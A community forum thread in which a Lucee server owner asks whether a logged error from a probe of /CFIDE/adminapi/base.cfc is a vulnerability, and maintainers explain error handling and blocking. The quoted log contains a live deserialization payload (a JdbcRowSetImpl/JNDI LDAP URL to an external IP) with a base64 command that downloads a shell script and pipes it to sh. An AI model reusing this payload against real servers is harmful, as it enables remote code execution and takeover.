Web site attack vulnerability? onCFCRequest

Peter · April 21, 2025, 10:01pm

Like most web sites, mine is often hit with attacks probing for vulnerabilities. Normally these result in 404 errors.

Recently I have had some try and load /CFIDE/adminapi/base.cfc
There is no such folder and when I try that folder, I get a custom 404 error page and no Lucee error. However, I have also caught this Lucee error when the attacker at 213.109.147.242 loaded the page.

lucee.runtime.interpreter.InterpreterException: Syntax Error, Invalid Construct at line [1] / column [1] / position [1] in the JSON 1: <wddxPacket version='1.0'><header/><data><struct type='Ecom.sun.rowset.JdbcRowSetImplE'><var name='dataSourceName'><string>ldap://166.108.229.166:8089/CommonsBeanutils1/base64/KGN1cmwgLXNTZmsgaHR0cDovLzE2Ni4xMDguMjI5LjE2Njo4MDg4L3NlcnZpY2Uuc2ggfHwgd2dldCAtcSAtTy0gaHR0cDovLzE2Ni4xMDguMjI5LjE2Njo4MDg4L3NlcnZpY2Uuc2gpIHwgc2g=</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket> ^ at lucee.runtime.interpreter.CFMLExpressionInterpreter.createSyntaxException(CFMLExpressionInterpreter.java:285)

My question is, how can Lucee have an error on a non-existent page, and is this a Lucee vulnerability?

OS: Windows Server 2025
Java Version: 21.0.6
Tomcat Version: 9.0.104
Lucee Version: 6.2.0.321

Zackster · April 21, 2025, 11:16pm

Can you DM me the full stacktrace?

both the json and wddx processing paths have been recently security reviewed, so this shouldn’t be a problem, but the team will review this

Jamo · April 27, 2025, 7:18pm

Do you expose any CFCs to the public? If not, you may want to consider using web server or WAF rules to explicitly block access or any bogus request for a non-existent CFC will return an error message and potentially expose sensitive information (paths, internal IPs, etc.)

Zackster · April 27, 2025, 11:33pm

A properly ocked down Internet facing server should be using a error template which reveals no details about any error, i.e. error-public.cfm

Peter · April 28, 2025, 7:11am

I modified the onCFCRequest function in application.cfc as advised towards the end of this page https://blog.adamcameron.me/2013/04/its-easy-to-create-security-hole-in.html

Zackster · April 28, 2025, 8:30am

that approach is only needed if you are overriding the default behaviour?

I did some investigation about this, Lucee could be returning better http status codes here, but there is no vulnerability here, just some error logging.

The only the chance of revealing information about your server, if you don’t have error handling / error template in place?

it’s no effectively no different than the exception calling the path to a missing .cfm file, it’s just that remote cfc’s support argumentCollection and Lucee only supports json, where as ACF also supports WDDX (which led to several of their CVEs over the years, Lucee’s WDDX support is much leaner than ACF and not vulnerable)

component {
	this.name = "ldev5530";
	function onCFCRequest(){
		// no op
	}

	function onError(){
		echo("oops");
	}
}

https://luceeserver.atlassian.net/browse/LDEV-5530

Peter · April 29, 2025, 6:44am

Thank you for the investigation and advice. I do have custom error and 404 error pages and not the default pages.